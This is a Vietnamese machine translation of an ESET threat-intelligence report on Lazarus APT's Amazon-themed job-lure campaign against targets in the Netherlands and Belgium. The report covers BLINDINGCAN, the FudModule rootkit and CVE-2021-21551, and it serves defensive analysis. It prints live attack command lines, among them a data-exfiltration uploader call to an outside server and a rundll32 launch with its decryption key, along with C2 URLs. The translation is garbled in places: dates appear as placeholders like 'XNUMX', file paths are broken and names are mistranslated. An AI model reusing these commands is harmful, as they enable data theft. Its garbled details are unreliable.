Các chiến dịch theo chủ đề Amazon về Lazarus ở Hà Lan và Bỉ

Các nhà nghiên cứu của ESET đã phát hiện và phân tích một bộ công cụ độc hại đã được nhóm Lazarus APT khét tiếng sử dụng trong các cuộc tấn công vào mùa thu năm 2021. Chiến dịch bắt đầu với các email lừa đảo chứa các tài liệu độc hại theo chủ đề Amazon và nhắm mục tiêu vào một nhân viên của một công ty hàng không vũ trụ ở Hà Lan , và một nhà báo chính trị ở Bỉ. Mục tiêu chính của những kẻ tấn công là xâm nhập dữ liệu. Lazarus (còn được gọi là HIDDEN COBRA) đã hoạt động ít nhất từ ​​năm 2009. Nó chịu trách nhiệm cho các sự cố cấp cao như cả hai Hack Sony Pictures Entertainment và hàng chục triệu đô la các nhà điều khiển mạng năm 2016, Các WannaCryptor (hay còn gọi là WannaCry) bùng phát vào năm 2017 và lịch sử lâu dài của các cuộc tấn công gây rối chống lại Cơ sở hạ tầng công cộng và quan trọng của Hàn Quốc ít nhất kể từ năm 2011.

Cả hai mục tiêu đều được đưa ra với lời mời làm việc - nhân viên ở Hà Lan nhận được tệp đính kèm qua LinkedIn Messaging và người ở Bỉ nhận được tài liệu qua email. Các cuộc tấn công bắt đầu sau khi các tài liệu này được mở. Những kẻ tấn công đã triển khai một số công cụ độc hại trên mỗi hệ thống, bao gồm bộ nhỏ giọt, bộ tải, backdoor HTTP (S) đầy đủ tính năng, bộ tải lên và trình tải xuống HTTP (S). Điểm chung giữa các bộ nhỏ giọt là chúng là các dự án mã nguồn mở được trojanized giải mã tải trọng được nhúng bằng cách sử dụng mật mã khối hiện đại với các khóa dài được truyền dưới dạng đối số dòng lệnh. Trong nhiều trường hợp, các tệp độc hại là các thành phần DLL được tải bên cạnh bởi các EXE hợp pháp, nhưng từ một vị trí bất thường trong hệ thống tệp.

Công cụ đáng chú ý nhất được cung cấp bởi những kẻ tấn công là một mô-đun chế độ người dùng có được khả năng đọc và ghi bộ nhớ hạt nhân do CVE-2021-21551 lỗ hổng trong trình điều khiển Dell hợp pháp. Đây là lần đầu tiên được ghi nhận lạm dụng lỗ hổng này trong tự nhiên. Sau đó, những kẻ tấn công đã sử dụng quyền truy cập ghi vào bộ nhớ nhân của chúng để vô hiệu hóa bảy cơ chế mà hệ điều hành Windows cung cấp để giám sát các hành động của nó, như đăng ký, hệ thống tệp, tạo quy trình, truy tìm sự kiện, v.v., về cơ bản làm mù các giải pháp bảo mật một cách rất chung chung và mạnh mẽ.

Trong bài đăng trên blog này, chúng tôi giải thích bối cảnh của chiến dịch và cung cấp phân tích kỹ thuật chi tiết về tất cả các thành phần. Nghiên cứu này đã được trình bày tại Hội nghị Bản tin Virus. Vì tính độc đáo, trọng tâm chính của bài thuyết trình là thành phần độc hại được sử dụng trong cuộc tấn công này sử dụng kỹ thuật Mang trình điều khiển dễ bị tổn thương của riêng bạn (BYOVD) và tận dụng lỗ hổng CVE-2021-21551 nói trên. Thông tin chi tiết có trong sách trắng Lazarus & BYOVD: Điều ác đối với lõi Windows.

Chúng tôi quy các cuộc tấn công này cho Lazarus với độ tin cậy cao, dựa trên các mô-đun cụ thể, chứng chỉ ký mã và cách tiếp cận xâm nhập phổ biến với các chiến dịch Lazarus trước đó như Hoạt động trong (ter) ception  và Hoạt động DreamJob. Sự đa dạng, số lượng và tính lập dị trong việc thực hiện các chiến dịch của Lazarus xác định nhóm này, cũng như nhóm này thực hiện cả ba trụ cột của các hoạt động tội phạm mạng: hoạt động gián điệp mạng, phá hoại mạng và theo đuổi lợi ích tài chính.

Quyền truy cập ban đầu

Các nhà nghiên cứu của ESET đã phát hiện ra hai cuộc tấn công mới: một cuộc tấn công nhằm vào nhân viên của một hãng truyền thông ở Bỉ và một cuộc tấn công nhằm vào nhân viên của một công ty hàng không vũ trụ ở Hà Lan.

Tại Hà Lan, cuộc tấn công đã ảnh hưởng đến một máy tính Windows 10 được kết nối với mạng công ty, nơi một nhân viên được liên hệ qua LinkedIn Messaging về một công việc tiềm năng mới, dẫn đến một email có tệp đính kèm tài liệu được gửi đi. Chúng tôi đã liên hệ với chuyên viên bảo mật của công ty bị ảnh hưởng, người có thể chia sẻ tài liệu độc hại với chúng tôi. Tệp Word Amzon_Hà Lan.docx được gửi đến mục tiêu chỉ là một tài liệu phác thảo có logo Amazon (xem Hình 1). Khi mở ra, mẫu từ xa https://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=_DO.PROJ (Ở đâu là một số có bảy chữ số) được tìm nạp. Chúng tôi không thể lấy được nội dung, nhưng chúng tôi cho rằng nó có thể chứa một lời mời làm việc cho chương trình không gian Amazon, Dự án Kuiper. Đây là một phương pháp mà La-xa-rơ đã thực hành trong Hoạt động trong (ter) ception và Hoạt động DreamJob các chiến dịch nhắm vào hàng không vũ trụ và các ngành công nghiệp quốc phòng.

Hình 1. Tài liệu theo chủ đề Amazon được gửi đến mục tiêu ở Hà Lan

Trong vòng vài giờ, một số công cụ độc hại đã được chuyển đến hệ thống, bao gồm bộ nhỏ giọt, bộ tải, backdoor HTTP (S) đầy đủ tính năng, bộ tải lên HTTP (S) và bộ tải xuống HTTP (S); xem phần Bộ công cụ.

Liên quan đến vụ tấn công ở Bỉ, nhân viên của một công ty báo chí (có địa chỉ email được công khai trên trang web của công ty) đã được liên hệ qua một email với lời dụ dỗ. AWS_EMEA_Legal_.docx đính kèm. Vì chúng tôi không nhận được tài liệu, chúng tôi chỉ biết tên của nó, điều này cho thấy nó có thể đang đưa ra lời mời làm việc ở một vị trí hợp pháp. Sau khi mở tài liệu, cuộc tấn công đã được kích hoạt, nhưng các sản phẩm ESET đã dừng lại ngay lập tức, chỉ với một tệp thực thi độc hại có liên quan. Khía cạnh thú vị ở đây là, tại thời điểm đó, tệp nhị phân này được ký hợp lệ bằng chứng chỉ ký mã.

Ghi công

Chúng tôi cho rằng cả hai cuộc tấn công đều dành cho nhóm Lazarus với sự tự tin cao độ. Điều này dựa trên các yếu tố sau, cho thấy mối quan hệ với các chiến dịch Lazarus khác:

1. Phần mềm độc hại (bộ xâm nhập):
   1. Cửa hậu HTTPS (SHA ‑ 1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) có nhiều điểm tương đồng với backdoor BLINDINGCAN, được báo cáo bởi CISA (US-CERT), và được gán cho HIDDEN COBRA, là mật danh của họ cho Lazarus.
   2. Trình tải lên HTTP (S) có những điểm tương đồng mạnh mẽ với công cụ C: ProgramDataIBM ~ DF234.TMP được đề cập trong báo cáo của HvS Consulting, Phần 2.10 Lọc.
   3. Đường dẫn và tên tệp đầy đủ, % ALLUSERSPROFILE% AdobeAdobe.tmp, giống với báo cáo của Kaspersky vào tháng 2021 năm XNUMX trong sách trắng về Lazarus's Mối đe dọa hoạt động, trong đó nhắm vào ngành công nghiệp quốc phòng.
   4. Chứng chỉ ký mã, được cấp cho công ty Hoa Kỳ VĂN PHÒNG Y TẾ “A”, PLLC và được sử dụng để ký một trong các ống nhỏ giọt, cũng đã được báo cáo trong chiến dịch chống lại các nhà nghiên cứu bảo mật; xem thêm nhóm Lazarus: chiến dịch 2 ĐỒ CHƠI, Báo cáo về mối đe dọa của ESET 2021 T1, Trang 11.
   5. Một loại mã hóa bất thường đã được tận dụng trong các công cụ của chiến dịch Lazarus này: HC-128. Các mật mã khác ít phổ biến hơn được Lazarus sử dụng trong quá khứ: một biến thể Spritz của RC4 trong lỗ tưới nước tấn công các ngân hàng Ba Lan và Mexico; sau đó, Lazarus đã sử dụng RC4 được sửa đổi trong Hoạt động trong (ter) ception; mật mã luồng A5 / 1 sửa đổi đã được sử dụng trong Cuộc tấn công chuỗi cung ứng của WIZVERA VeraPort.
2. Cơ sở hạ tầng:
   1. Đối với máy chủ C&C cấp một, những kẻ tấn công không sử dụng máy chủ của riêng chúng mà thay vào đó là hack những máy chủ hiện có. Đây là một hành vi điển hình nhưng thiếu tự tin của Lazarus.

Bộ công cụ

Một trong những đặc điểm điển hình của Lazarus là việc phân phối tải trọng cuối cùng dưới dạng một chuỗi gồm hai hoặc ba giai đoạn. Nó bắt đầu với một ống nhỏ giọt - thường là một ứng dụng mã nguồn mở bị trojanized - giải mã tải trọng được nhúng bằng mật mã khối hiện đại như AES-128 (điều này không có gì lạ đối với Lazarus, ví dụ: Mã sách hoạt độnghoặc một XOR bị xáo trộn, sau khi phân tích cú pháp các đối số dòng lệnh cho một khóa mạnh. Mặc dù trọng tải được nhúng không được đưa vào hệ thống tệp mà được tải trực tiếp vào bộ nhớ và được thực thi, chúng tôi biểu thị phần mềm độc hại đó là một ống nhỏ giọt. Phần mềm độc hại không có bộ đệm được mã hóa nhưng tải trọng tải từ hệ thống tệp, chúng tôi biểu thị là trình tải.

Các ống nhỏ giọt có thể (Bảng 1) hoặc có thể không (Bảng 2) được nạp bên bởi một quy trình hợp pháp (Microsoft). Trong trường hợp đầu tiên ở đây, ứng dụng hợp pháp nằm ở một vị trí bất thường và thành phần độc hại mang tên của DLL tương ứng nằm trong số các lần nhập của ứng dụng. Ví dụ: DLL độc hại coloui.dll được tải bên bởi một ứng dụng hệ thống hợp pháp Bảng điều khiển màu (colorcpl.exe), cả hai đều nằm ở C: ProgramDataPTC. Tuy nhiên, vị trí thông thường cho ứng dụng hợp pháp này là % WINDOWS% Hệ thống32.

Trong mọi trường hợp, ít nhất một đối số dòng lệnh được truyền trong thời gian chạy, đóng vai trò như một tham số bên ngoài cần thiết để giải mã tải trọng được nhúng. Các thuật toán giải mã khác nhau được sử dụng; xem cột cuối cùng trong Bảng 1 và Bảng 2. Trong một số trường hợp khi AES-128 được sử dụng, cũng có một tham số mã cứng nội bộ cùng với tên của quy trình mẹ và tên DLL của nó, tất cả đều cần thiết để giải mã thành công.

Bảng 1. Các tệp DLL độc hại được tải bên cạnh bởi một quy trình hợp pháp từ một vị trí bất thường

Bảng 2. Phần mềm độc hại khác liên quan đến cuộc tấn công

Sau khi giải mã thành công, bộ đệm được kiểm tra định dạng PE thích hợp và việc thực thi được chuyển cho nó. Quy trình này có thể được tìm thấy trong hầu hết các bộ nhỏ giọt và bộ nạp. Sự khởi đầu của nó có thể được nhìn thấy trong Hình 2.

Hình 2. Bộ đệm được giải mã là một bộ nhớ thực thi 64-bit

Cửa hậu HTTP (S): BLINDINGCAN

Chúng tôi đã xác định một cửa hậu HTTP (S) đầy đủ tính năng - một RAT được gọi là BLINDINGCAN - được sử dụng trong cuộc tấn công.

Ống nhỏ giọt của tải trọng này đã được thực thi như % ALLUSERSPROFILE% PTCcolorui.dll; xem Bảng 1 để biết chi tiết. Trọng tải được trích xuất và giải mã bằng cách sử dụng XOR đơn giản nhưng có khóa dài, là một chuỗi được tạo bằng cách ghép tên của quy trình mẹ, là tên tệp riêng và tham số dòng lệnh bên ngoài - tại đây COLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.

Tải trọng, SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2, là một DLL 64-bit VMProtect-ed. Một kết nối được thực hiện đến một trong những địa điểm từ xa https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. Trong mã được ảo hóa, chúng tôi đã xoay vòng qua các tạo tác RTTI rất cụ thể sau được tìm thấy trong tệp thực thi: .? AVCHTTP_Protocol @@,.? AVCFileRW @@. Hơn nữa, có sự giống nhau ở cấp độ mã, vì chỉ số của các lệnh bắt đầu với cùng một giá trị, 8201; xem Hình 3. Điều này đã giúp chúng tôi xác định RAT này là BLINDINGCAN (SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D), được báo cáo lần đầu tiên bởi CISA. Phiên bản gần đây của tải trọng này đã được quan sát thấy trong một chiến dịch khác có chủ đề của Amazon, trong đó BLINDINGCAN đã bị một khách hàng Putty-0.77 bị trojanized đánh rơi: xem blog của Mandiant.

Dựa trên số lượng mã lệnh có sẵn cho người vận hành, có khả năng là một bộ điều khiển phía máy chủ có sẵn để người vận hành có thể kiểm soát và khám phá các hệ thống bị xâm phạm. Các hành động được thực hiện trong bộ điều khiển này có thể dẫn đến các ID lệnh tương ứng và các tham số của chúng được gửi đến RAT đang chạy trên hệ thống của mục tiêu. Danh sách các mã lệnh có trong Bảng 3 và đồng ý với phân tích được thực hiện bởi JPCERT / CC, Phụ lục C. Không có kiểm tra xác thực các thông số như tên thư mục hoặc tệp tin. Điều đó có nghĩa là tất cả các kiểm tra phải được thực hiện ở phía máy chủ, điều này cho thấy rằng bộ điều khiển phía máy chủ là một ứng dụng phức tạp, rất có thể có GUI thân thiện với người dùng.

Bảng 3. Các lệnh của RAT

Bộ nạp trung gian

Bây giờ chúng tôi mô tả một chuỗi ba giai đoạn, thật không may, chúng tôi chỉ có thể xác định hai bước đầu tiên: một ống nhỏ giọt và một bộ nạp trung gian.

Giai đoạn đầu tiên là một ống nhỏ giọt nằm ở C: WindowsVsscredui.dll và được chạy qua một ứng dụng hợp pháp - nhưng dễ bị tấn công thứ tự tìm kiếm DLL - với tham số (bên ngoài) C: WindowsVssWFS.exe A39T8kcfkXymmAcq. Chương trình WFS.exe là một bản sao của ứng dụng Windows Fax và Scan, nhưng vị trí tiêu chuẩn của nó là % WINDOWS% Hệ thống32.

Ống nhỏ giọt là một trojanized Trình cắm GOnpp cho Notepad ++, được viết bằng ngôn ngữ lập trình Go. Sau khi giải mã, ống nhỏ giọt sẽ kiểm tra xem bộ đệm có phải là tệp thực thi 64-bit hợp lệ hay không và sau đó, nếu có, tải nó vào bộ nhớ để giai đoạn thứ hai sẵn sàng thực thi.

Mục tiêu của giai đoạn trung gian này là tải một trọng tải bổ sung vào bộ nhớ và thực thi nó. Nó thực hiện nhiệm vụ này trong hai bước. Đầu tiên nó đọc và giải mã tệp cấu hình C: \ windowsSystem32wlansvc.cpl, như phần mở rộng của nó có thể gợi ý, không phải là tệp thực thi (được mã hóa), mà là tệp dữ liệu chứa các phần 14944 byte có cấu hình. Chúng tôi không có dữ liệu cụ thể từ cuộc tấn công hiện tại; tuy nhiên, chúng tôi đã thu được cấu hình như vậy từ một cuộc tấn công Lazarus khác: xem Hình 5. Cấu hình dự kiến ​​sẽ bắt đầu bằng một từ kép đại diện cho tổng kích thước của bộ đệm còn lại (xem Dòng 69 trong Hình 4 bên dưới và biến u32TotalSize), theo sau là một mảng 14944 cấu trúc dài byte chứa ít nhất hai giá trị: tên của DLL đang tải làm trình giữ chỗ để xác định phần còn lại của cấu hình (tại phần bù 168 của Dòng 74 trong Hình 4 và thành viên được đánh dấu trong Hình 5).

Hình 4. Bước đầu tiên của việc giải mã tệp cấu hình và kiểm tra xem tên của tệp DLL đang tải có khớp với tên được mong đợi hay không

Bước thứ hai là hành động đọc, giải mã và tải tệp này, rất có thể là giai đoạn thứ ba và cuối cùng. Nó được mong đợi là một tệp thực thi 64-bit và được tải vào bộ nhớ giống như cách mà bộ nhỏ giọt ở giai đoạn đầu xử lý bộ tải trung gian. Khi bắt đầu thực thi, một mutex được tạo như một đoạn nối của chuỗi GlobalAppCompatCacheObject và tổng kiểm tra CRC32 của tên DLL của nó (credui.dll) được biểu diễn dưới dạng số nguyên có dấu. Giá trị phải bằng GlobalAppCompatCacheObject-1387282152 if wlansvc.cpl tồn tại và -1387282152 nếu không thì.

Hình 5. Cấu hình của bộ nạp trung gian. Tên tệp được đánh dấu sẽ khớp với tên của phần mềm độc hại đang chạy; xem thêm Hình 4.

Một thực tế thú vị là việc sử dụng thuật toán giải mã này (Hình 4, Dòng 43 & 68), thuật toán này không phổ biến trong bộ công cụ Lazarus cũng như phần mềm độc hại nói chung. Các hằng số 0xB7E15163 và 0x61C88647 (đó là -0x9E3779B9; xem Hình 6, Dòng 29 & 35) trong sự mở rộng quan trọng gợi ý rằng đó là thuật toán RC5 hoặc RC6. Bằng cách kiểm tra vòng lặp giải mã chính của thuật toán, người ta xác định rằng nó phức tạp hơn trong hai, RC6. Một ví dụ về một mối đe dọa tinh vi sử dụng mã hóa không phổ biến như vậy là BananaUsurper của Equations Group; hiểu Báo cáo của Kaspersky 2016.

Hình 6. Mở rộng chính của RC6

Trình tải xuống HTTP (S)

Trình tải xuống sử dụng các giao thức HTTP (S) cũng được phân phối vào hệ thống của mục tiêu.

Nó được cài đặt bằng ống nhỏ giọt giai đoạn đầu (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657), là một trojanized libpcre-8.44 thư viện. Nó được thực hiện bởi lệnh

cmd.exe / c start / b rundll32.exe C: \ PublicCachemsdxm.ocx, sCtrl 93E41C6E20911B9B36BC

(tham số là một khóa XOR để trích xuất tải trọng được nhúng; xem Bảng 2). Ống nhỏ giọt cũng đạt được sự bền bỉ bằng cách tạo ra OneNoteTray.LNK tập tin nằm trong % APPDATA% MicrosoftWindowsStart MenuProgramsStartup thư mục.

Giai đoạn thứ hai là mô-đun VMProtect-ed 32-bit thực hiện yêu cầu kết nối HTTP đến máy chủ C&C được lưu trữ trong cấu hình của nó; xem Hình 7. Nó sử dụng cùng một Tác nhân Người dùng - Mozilla / 5.0 (Windows NT 6.1; WOW64) Chrome / 28.0.1500.95 Safari / 537.36 - dưới dạng BLINDINGCAN RAT, chứa cấu phần RTTI .? AVCHTTP_Protocol @@ nhưng không .? AVCFileRW @@và thiếu các tính năng như chụp ảnh màn hình, lưu trữ tệp hoặc thực hiện lệnh qua dòng lệnh. Nó có thể tải một tệp thực thi vào một khối bộ nhớ mới được cấp phát và chuyển thực thi mã cho nó.

Hình 7. Cấu hình của trình tải xuống HTTP (S). Các giá trị được đánh dấu là kích thước của cấu hình và số lượng URL. Trong cuộc tấn công mà chúng tôi quan sát thấy, tất cả các URL đều giống hệt nhau.

Trình tải lên HTTP (S)

Công cụ Lazarus này chịu trách nhiệm lọc dữ liệu bằng cách sử dụng các giao thức HTTP hoặc HTTPS.

Nó cũng được phân phối trong hai giai đoạn. Ống nhỏ giọt ban đầu được trojanized sqlite-3.31.1 thư viện. Các mẫu Lazarus thường không chứa đường dẫn PDB, nhưng trình tải này có một đường dẫn, W: DevelopToolHttpUploaderHttpPOSTPro_BINRUNDLL64sqlite3.pdb, điều này cũng gợi ý ngay chức năng của nó - một Trình tải lên HTTP.

Ống nhỏ giọt mong đợi nhiều tham số dòng lệnh: một trong số đó là mật khẩu cần thiết để giải mã và tải trọng tải được nhúng; phần còn lại của các tham số được chuyển cho tải trọng. Chúng tôi không nắm bắt được các thông số, nhưng may mắn thay, việc sử dụng công cụ này trong tự nhiên đã được quan sát thấy trong một cuộc điều tra pháp y của Tư vấn HvS:

C: ProgramDataIBM ~ DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C: ProgramDataIBMrestore0031.dat data03 10000 -p 192.168.1.240 8080

Tham số đầu tiên, S0RMM-50QQE-F65DN-DCPYN-5QEQA, hoạt động như một khóa cho quy trình giải mã của ống nhỏ giọt (nói chính xác hơn, một quá trình giải mã được thực hiện trước tiên, trong đó bộ đệm được mã hóa được XOR-ed với bản sao của nó được dịch chuyển một byte; sau đó là giải mã XOR với khóa theo sau). Phần còn lại của các tham số được lưu trữ trong một cấu trúc và được chuyển sang giai đoạn thứ hai. Để biết giải thích về ý nghĩa của chúng, hãy xem Bảng 4.

Bảng 4. Các tham số dòng lệnh cho trình cập nhật HTTP (S)

Giai đoạn thứ hai là chính trình tải lên HTTP. Tham số duy nhất cho giai đoạn này là cấu trúc chứa máy chủ C&C cho quá trình lọc, tên tệp của tệp lưu trữ RAR cục bộ, tên gốc của tệp lưu trữ RAR ở phía máy chủ, tổng kích thước của phần chia RAR tính bằng kilobyte, một tùy chọn phạm vi của các chỉ số phân tách và một tùy chọn -p chuyển đổi bằng IP proxy nội bộ và một cổng; xem Bảng 4. Ví dụ: nếu kho lưu trữ RAR được chia thành 88 phần, mỗi phần lớn 10,000 kB, thì người tải lên sẽ gửi các phần tách này và lưu trữ chúng ở phía máy chủ dưới tên dữ liệu03.000000.avi, dữ liệu03.000001.avi,…, dữ liệu03.000087.avi. Xem Hình 8, Dòng 42 nơi các chuỗi này được định dạng.

Tác nhân người dùng giống như đối với BLINDINGCAN và trình tải xuống HTTP (S),  Mozilla / 5.0 (Windows NT 6.1; WOW64) Chrome / 28.0.1500.95 Safari / 537.36.

Hình 8. Quá trình lọc RAR tách thành máy chủ C&C

Rootkit FudModule

Chúng tôi đã xác định một thư viện được liên kết động với tên nội bộ FudModule.dll cố gắng vô hiệu hóa các tính năng giám sát khác nhau của Windows. Nó làm như vậy bằng cách sửa đổi các biến nhân và loại bỏ các lệnh gọi lại của nhân, điều này có thể thực hiện được vì mô-đun có được khả năng viết trong nhân bằng cách tận dụng các kỹ thuật BYOVD - cụ thể CVE-2021-21551 lỗ hổng trong trình điều khiển Dell dbutil_2_3.sys.

Phân tích đầy đủ về phần mềm độc hại này có sẵn dưới dạng bài báo VB2022 Lazarus & BYOVD: điều ác đối với lõi Windows.

Phần mềm độc hại khác

Các bộ nhỏ giọt và bộ tải bổ sung đã được phát hiện trong các cuộc tấn công, nhưng chúng tôi không có được các thông số cần thiết để giải mã các tải trọng được nhúng hoặc các tệp được mã hóa.

lecui trojan

Một dự án lecui của Alec Musafa phục vụ những kẻ tấn công như một cơ sở mã để trojanization hai bộ nạp bổ sung. Bằng tên tệp của mình, chúng đã được ngụy trang thành thư viện của Microsoft mi.dll (Cơ sở hạ tầng quản lý) và cryptsp.dll (API nhà cung cấp dịch vụ mật mã), và điều này là do việc tải bên dự kiến ​​của các ứng dụng hợp pháp wsmprovhost.exe và SMSvcHost.exe, tương ứng; xem Bảng 1.

Mục đích chính của các trình tải này là đọc và giải mã các tệp thực thi nằm trong luồng dữ liệu thay thế (QUẢNG CÁO) lúc C: ProgramDataCaphyonmi.dll: Zone.Identifier và C: Program FilesWindows Media PlayerSkinsDarkMode.wmz: Zone.Identifier, tương ứng. Vì chúng tôi chưa có được các tệp này nên không biết tải trọng nào bị ẩn ở đó; tuy nhiên, điều chắc chắn duy nhất là nó là một tệp thực thi, vì quá trình tải diễn ra sau quá trình giải mã (xem Hình 2). Việc sử dụng ADS không phải là mới, vì Ahnlab đã báo cáo một Cuộc tấn công của Lazarus chống lại các công ty Hàn Quốc vào tháng 2021 năm XNUMX liên quan đến các kỹ thuật như vậy.

Văn bản ngón tay bị Trojan hóa

ESET đã chặn một ứng dụng mã nguồn mở bị trojanized bổ sung, FingerText 0.5.61 bởi erinata, Đặt vị trí tại % WINDIR% securitycredui.dll. Các tham số dòng lệnh chính xác không được biết. Như trong một số trường hợp trước đó, ba tham số được yêu cầu để giải mã AES-128 của tải trọng được nhúng: tên của quy trình mẹ, WFS.exe; thông số nội bộ, mg89h7MsC5Da4ANi; và tham số bên ngoài bị thiếu.

Trojan sslSniffer

Cuộc tấn công nhằm vào một mục tiêu ở Bỉ đã bị chặn sớm trong chuỗi triển khai của nó nên chỉ có một tệp được xác định, một ống nhỏ giọt 32 bit nằm tại C: PublicCachemsdxm.ocx. Nó là một thành phần sslSniffer từ sóiSSL dự án đã được trojanized. Vào thời điểm xảy ra cuộc tấn công, nó đã được ký hợp lệ với một chứng chỉ được cấp cho VĂN PHÒNG Y TẾ “A”, PLLC (xem Hình 8), đã hết hạn.

Hình 9. Chứng chỉ được ký hợp lệ nhưng đã hết hạn

Nó có hai cách xuất độc hại mà DLL hợp pháp không có: SetOfficeCertInit và SetOfficeCert. Cả hai lần xuất đều yêu cầu chính xác hai tham số. Mục đích của lần xuất đầu tiên là thiết lập tính bền bỉ bằng cách tạo OfficeSync.LNK, nằm ở % APPDATA% MicrosoftWindowsStart MenuProgramsStartup, trỏ đến DLL độc hại và chạy lần xuất thứ hai của nó qua rundll32.exe với các tham số được truyền cho chính nó.

Lần xuất thứ hai, SetOfficeCert, sử dụng tham số đầu tiên làm khóa để giải mã tải trọng được nhúng, nhưng chúng tôi không thể giải nén nó vì chúng tôi không biết khóa.

Thuật toán giải mã cũng rất thú vị khi những kẻ tấn công sử dụng HC-128 với khóa 128 bit làm tham số đầu tiên và đối với vectơ khởi tạo 128 bit, chuỗi ffffffffffffffff. Các hằng số tiết lộ mật mã được hiển thị trong Hình 10.

Hình 10. Thiết lập khóa với các hằng số được đánh dấu gợi ý mật mã HC-128

Kết luận

Trong cuộc tấn công này, cũng như trong nhiều cuộc tấn công khác do Lazarus gây ra, chúng tôi thấy rằng nhiều công cụ được phân phối ngay cả trên một điểm cuối được nhắm mục tiêu duy nhất trong một mạng lưới quan tâm. Không còn nghi ngờ gì nữa, đội ngũ đứng sau hàng công khá lớn, được tổ chức có hệ thống và được chuẩn bị kỹ lưỡng. Lần đầu tiên, những kẻ tấn công có thể tận dụng CVE-2021-21551 để tắt tính năng giám sát của tất cả các giải pháp bảo mật. Nó không chỉ được thực hiện trong không gian hạt nhân mà còn theo một cách mạnh mẽ, sử dụng một loạt các phần tử bên trong Windows ít hoặc không có tài liệu. Không nghi ngờ gì nữa, điều này đòi hỏi kỹ năng nghiên cứu, phát triển và thử nghiệm sâu.

Theo quan điểm của những người bảo vệ, việc hạn chế khả năng truy cập ban đầu có vẻ dễ dàng hơn là chặn bộ công cụ mạnh mẽ sẽ được cài đặt sau khi những kẻ tấn công xác định có được chỗ đứng trong hệ thống. Như trong nhiều trường hợp trước đây, một nhân viên rơi vào bẫy của những kẻ tấn công là điểm thất bại ban đầu ở đây. Trong các mạng nhạy cảm, các công ty nên nhấn mạnh rằng nhân viên không theo đuổi các chương trình cá nhân của họ, như tìm việc, trên các thiết bị thuộc cơ sở hạ tầng của công ty họ.

IoC

Bạn có thể tìm thấy danh sách đầy đủ các Chỉ số Thỏa hiệp và các mẫu trong GitHub kho.

mạng

Kỹ thuật MITER ATT & CK

Bảng này được tạo bằng cách sử dụng phiên bản 11 của khung MITER ATT & CK.

dự án

Ahnlab. Báo cáo phân tích về cuộc tấn công Rootkit của Lazarus Group bằng BYOVD. Câu thơ. 1.0. Ngày 22 tháng 2022 năm XNUMX. Lấy từ Trung tâm Ứng cứu Khẩn cấp Bảo mật AhnLab.

Ahnlab. (2021, ngày 4 tháng XNUMX). APT tấn công các công ty trong nước bằng cách sử dụng tệp thư viện. Lấy từ Trung tâm Ứng cứu Khẩn cấp Bảo mật AhnLab.

Ahnlab. (2022, ngày 22 tháng XNUMX). Báo cáo phân tích về cuộc tấn công Rootkit của Lazarus Group bằng BYOVD. Lấy từ Trung tâm Ứng cứu Khẩn cấp Bảo mật AhnLab.

Breitenbacher, D., & Kaspars, O. (2020, tháng XNUMX). Operation In (ter) ception: Các công ty hàng không vũ trụ và quân sự trong ranh giới của không gian mạng. Lấy từ WeLiveSecurity.com.

Nhóm nghiên cứu ClearSky. (2020, ngày 13 tháng XNUMX). Chiến dịch 'Công việc trong mơ' Chiến dịch gián điệp trên diện rộng của Triều Tiên. Lấy từ ClearSky.com.

Dekel, K. (nd). Nghiên cứu Bảo mật của Phòng thí nghiệm Sentinel. CVE-2021-21551- Hàng trăm triệu máy tính Dell gặp rủi ro do nhiều lỗi nâng cấp đặc quyền của trình điều khiển BIOS. Lấy từ SentinelOne.com.

ESET. (2021, ngày 3 tháng XNUMX). Báo cáo Đe doạ của ESET T 1 2021. Lấy từ WeLiveSecurity.com.

Tuyệt. (2016, ngày 16 tháng XNUMX). Quà tặng phương trình. Lấy từ SecureList.com.

HvS-Consulting AG. (2020, ngày 15 tháng XNUMX). Lời chào từ Lazarus: Giải phẫu chiến dịch gián điệp mạng. Lấy từ hvs-consults.de.

Cherepanov, A., & Kálnai, P. (2020, tháng XNUMX). Cuộc tấn công chuỗi cung ứng của Lazarus ở Hàn Quốc. Lấy từ WeLiveSecurity.com.

Kalnai, P. (2017, 2 17). Làm sáng tỏ phần mềm độc hại được nhắm mục tiêu được sử dụng chống lại các ngân hàng Ba Lan. (ESET) Lấy từ WeLiveSecurity.com.

Kopeytsev, V., & Park, S. (2021, tháng XNUMX). Lazarus nhắm mục tiêu vào ngành công nghiệp quốc phòng với ThreatNeedle. (Kaspersky Lab) Lấy từ SecureList.com.

Lee, T.-w., Dong-wook và Kim, B.-j. (Năm 2021). Mã sổ hoạt động - Nhắm mục tiêu đến Hàn Quốc. Bản tin Virus. localhost. Lấy từ vblocalhost.com.

Maclachlan, J., Potaczek, M., Isakovic, N., Williams, M., & Gupta, Y. (2022, ngày 14 tháng XNUMX). Đã đến lúc PuTTY! Cơ hội việc làm CHDCND Triều Tiên Lừa đảo qua WhatsApp. Lấy từ Mandiant.com.

Tomonaga, S. (2020, ngày 29 tháng XNUMX). BLINDINGCAN - Phần mềm độc hại được Lazarus sử dụng. (JPCERT / CC) Lấy từ blog.jpcert.or.jp.

US-CERT CISA. (2020, ngày 19 tháng XNUMX). MAR-10295134-1.v1 - Trojan truy cập từ xa của Triều Tiên: BLINDINGCAN. (CISA) Lấy từ cisa.gov.

Weidemann, A. (2021, 1 25). Chiến dịch mới nhắm mục tiêu các nhà nghiên cứu bảo mật. (Nhóm phân tích mối đe dọa của Google) Lấy từ blog.google.

Wu, H. (2008). Mật mã dòng HC-128. Trong M. Robshaw, & O. Billet, Thiết kế mật mã luồng mới (Quyển 4986). Berlin, Heidelberg: Springer. Lấy từ doi.org.